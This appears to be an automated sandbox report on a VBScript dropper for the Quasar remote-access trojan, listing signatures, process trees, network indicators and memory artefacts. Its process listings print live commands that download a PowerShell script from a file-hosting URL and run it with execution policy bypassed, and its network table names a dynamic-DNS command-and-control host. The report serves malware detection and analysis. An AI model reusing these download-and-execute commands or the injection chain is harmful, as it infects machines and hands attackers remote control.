Malware Analysis Report

2025-04-14 05:06

Sample ID 230116-jl7vcsbf97
Target vb.vbs
SHA256 664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82
Tags
quasar office04 spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82

Threat Level: Known bad

The file vb.vbs was found to be: Known bad.

Malicious Activity Summary

quasar office04 spyware trojan

Quasar RAT

Quasar payload

Checks computer location settings

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-16 07:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-16 07:46

Reported

2023-01-16 07:51

Platform

win7-20221111-en

Max time kernel

40s

Max time network

29s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2004 wrote to memory of 1424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2004 wrote to memory of 1424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2004 wrote to memory of 1424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1424 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1424 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1424 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2004 wrote to memory of 1876 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2004 wrote to memory of 1876 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2004 wrote to memory of 1876 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1876 wrote to memory of 1616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1876 wrote to memory of 1616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1876 wrote to memory of 1616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1616 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

Network

N/A

Files

memory/2004-54-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp

memory/1424-55-0x0000000000000000-mapping.dmp

memory/580-56-0x0000000000000000-mapping.dmp

memory/1876-57-0x0000000000000000-mapping.dmp

memory/1616-58-0x0000000000000000-mapping.dmp

memory/1780-59-0x0000000000000000-mapping.dmp

memory/1780-61-0x000007FEF3220000-0x000007FEF3C43000-memory.dmp

memory/1780-62-0x0000000002824000-0x0000000002827000-memory.dmp

memory/1780-63-0x000007FEF2600000-0x000007FEF315D000-memory.dmp

memory/1780-64-0x000000000282B000-0x000000000284A000-memory.dmp

memory/1780-65-0x0000000002824000-0x0000000002827000-memory.dmp

memory/1780-66-0x000000000282B000-0x000000000284A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-16 07:46

Reported

2023-01-16 07:50

Platform

win10v2004-20220812-en

Max time kernel

160s

Max time network

208s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4628 set thread context of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4496 wrote to memory of 4828 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4496 wrote to memory of 4828 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4828 wrote to memory of 4780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4828 wrote to memory of 4780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4780 wrote to memory of 4792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4780 wrote to memory of 4792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4496 wrote to memory of 4584 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4496 wrote to memory of 4584 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4584 wrote to memory of 1996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4584 wrote to memory of 1996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1996 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1996 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\curl.exe

curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
N/A 52.182.141.63:443 tcp
N/A 93.184.221.240:80 tcp
N/A 8.8.8.8:53 files.catbox.moe udp
N/A 107.160.74.134:443 files.catbox.moe tcp
N/A 93.184.221.240:80 tcp
N/A 8.8.8.8:53 151.122.125.40.in-addr.arpa udp
N/A 8.8.8.8:53 ghcc.duckdns.org udp
N/A 95.216.102.32:4782 ghcc.duckdns.org tcp
N/A 8.8.8.8:53 tools.keycdn.com udp
N/A 185.172.148.96:443 tools.keycdn.com tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 64.185.227.155:443 api.ipify.org tcp

Files

memory/4828-132-0x0000000000000000-mapping.dmp

memory/4780-133-0x0000000000000000-mapping.dmp

memory/4792-134-0x0000000000000000-mapping.dmp

memory/4584-135-0x0000000000000000-mapping.dmp

memory/1996-136-0x0000000000000000-mapping.dmp

memory/4628-137-0x0000000000000000-mapping.dmp

memory/4628-138-0x0000019043090000-0x00000190430B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\rr.ps1

MD5 7aad8bcb11ff3deab23cc311222fe265
SHA1 3d9a69c71e00aff947af949441220f18bad9e0d8
SHA256 c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a
SHA512 f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9

memory/4628-140-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp

memory/1644-141-0x0000000000400000-0x0000000000484000-memory.dmp

memory/1644-142-0x000000000047E7AE-mapping.dmp

memory/4628-143-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp

memory/1644-144-0x0000000005900000-0x0000000005EA4000-memory.dmp

memory/1644-145-0x0000000005350000-0x00000000053E2000-memory.dmp

memory/1644-146-0x00000000052E0000-0x00000000052EA000-memory.dmp

memory/1644-147-0x00000000066D0000-0x0000000006CE8000-memory.dmp

memory/1644-148-0x0000000005860000-0x00000000058B0000-memory.dmp

memory/1644-149-0x00000000062E0000-0x0000000006392000-memory.dmp

memory/1644-150-0x00000000075A0000-0x0000000007606000-memory.dmp